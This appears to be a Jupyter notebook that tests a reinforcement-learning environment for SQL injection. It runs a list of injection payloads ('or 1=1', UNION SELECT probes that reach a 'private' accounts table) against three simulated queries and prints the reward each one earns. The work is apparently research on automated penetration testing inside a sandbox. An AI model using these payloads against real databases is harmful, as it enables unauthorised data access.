In [1]:
import numpy as np
from IPython.display import clear_output, display
from tqdm import tqdm
import sys
sys.path.append("../")
import environment
import gym
import structured.generate_actions as gen_acts
import constants

In [2]:
env = gym.make('SQLstruct-v1')

In [3]:
actions = env.structured_actions
env.reset()

array([1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
       1., 1., 1., 1., 1., 1., 1., 1.])

In [4]:
helper_list = ["ERROR", "Untested", "blank", "somet"]

In [5]:
print(env.hidden_query)
counter = 0
for action in actions:
    #print(env.step(action)[1],"||||", env.hidden_query.format(input = action))
    response = env.step(counter)
    print(helper_list[int(response[0][counter])], response[1],"||||", env.hidden_query.format(input = action))
    counter += 1
env.state

SELECT id, username, firstname FROM users WHERE age={input}
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE age=
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE age=1' or 1=1 --
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE age=1' or 1=2 --
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE age=1' union select NULL --
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE age=1' union select NULL, NULL --
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE age=1' union select NULL, NULL, NULL --
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE age=1' union select account from private --
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE age=1' union select account, NULL from private --
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE age=1' union select account, NULL, NULL from private --
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE age=1" or

array([0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
       3., 2., 0., 0., 3., 0., 0., 3.])

In [6]:
env.reset()
print(env.hidden_query)
counter = 0
for action in actions:
    #print(env.step(action)[1],"||||", env.hidden_query.format(input = action))
    response = env.step(counter)
    print(helper_list[int(response[0][counter])], response[1],"||||", env.hidden_query.format(input = action))
    counter += 1
env.state

SELECT id, username, firstname FROM users WHERE firstname='{input}'
blank -0.1 |||| SELECT id, username, firstname FROM users WHERE firstname=''
somet -0.1 |||| SELECT id, username, firstname FROM users WHERE firstname='1' or 1=1 --'
blank -0.1 |||| SELECT id, username, firstname FROM users WHERE firstname='1' or 1=2 --'
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE firstname='1' union select NULL --'
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE firstname='1' union select NULL, NULL --'
somet -0.1 |||| SELECT id, username, firstname FROM users WHERE firstname='1' union select NULL, NULL, NULL --'
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE firstname='1' union select account from private --'
ERROR -1.0 |||| SELECT id, username, firstname FROM users WHERE firstname='1' union select account, NULL from private --'
somet 100 |||| SELECT id, username, firstname FROM users WHERE firstname='1' union select account, NULL, NULL from privat

array([2., 3., 2., 0., 0., 3., 0., 0., 3., 2., 2., 2., 2., 2., 2., 2., 2.,
       2., 2., 2., 2., 2., 2., 2., 2.])

In [7]:
env.reset()
print(env.hidden_query)
counter = 0
for action in actions:
    #print(env.step(action)[1],"||||", env.hidden_query.format(input = action))
    response = env.step(counter)
    print(helper_list[int(response[0][counter])], response[1],"||||", env.hidden_query.format(input = action))
    counter += 1
env.state

SELECT id FROM users WHERE nationality="{input}"
blank -0.1 |||| SELECT id FROM users WHERE nationality=""
blank -0.1 |||| SELECT id FROM users WHERE nationality="1' or 1=1 --"
blank -0.1 |||| SELECT id FROM users WHERE nationality="1' or 1=2 --"
blank -0.1 |||| SELECT id FROM users WHERE nationality="1' union select NULL --"
blank -0.1 |||| SELECT id FROM users WHERE nationality="1' union select NULL, NULL --"
blank -0.1 |||| SELECT id FROM users WHERE nationality="1' union select NULL, NULL, NULL --"
blank -0.1 |||| SELECT id FROM users WHERE nationality="1' union select account from private --"
blank -0.1 |||| SELECT id FROM users WHERE nationality="1' union select account, NULL from private --"
blank -0.1 |||| SELECT id FROM users WHERE nationality="1' union select account, NULL, NULL from private --"
somet -0.1 |||| SELECT id FROM users WHERE nationality="1" or 1=1 --"
blank -0.1 |||| SELECT id FROM users WHERE nationality="1" or 1=2 --"
somet -0.1 |||| SELECT id FROM users WHERE 

array([2., 2., 2., 2., 2., 2., 2., 2., 2., 3., 2., 3., 0., 0., 3., 0., 0.,
       2., 2., 2., 2., 2., 2., 2., 2.])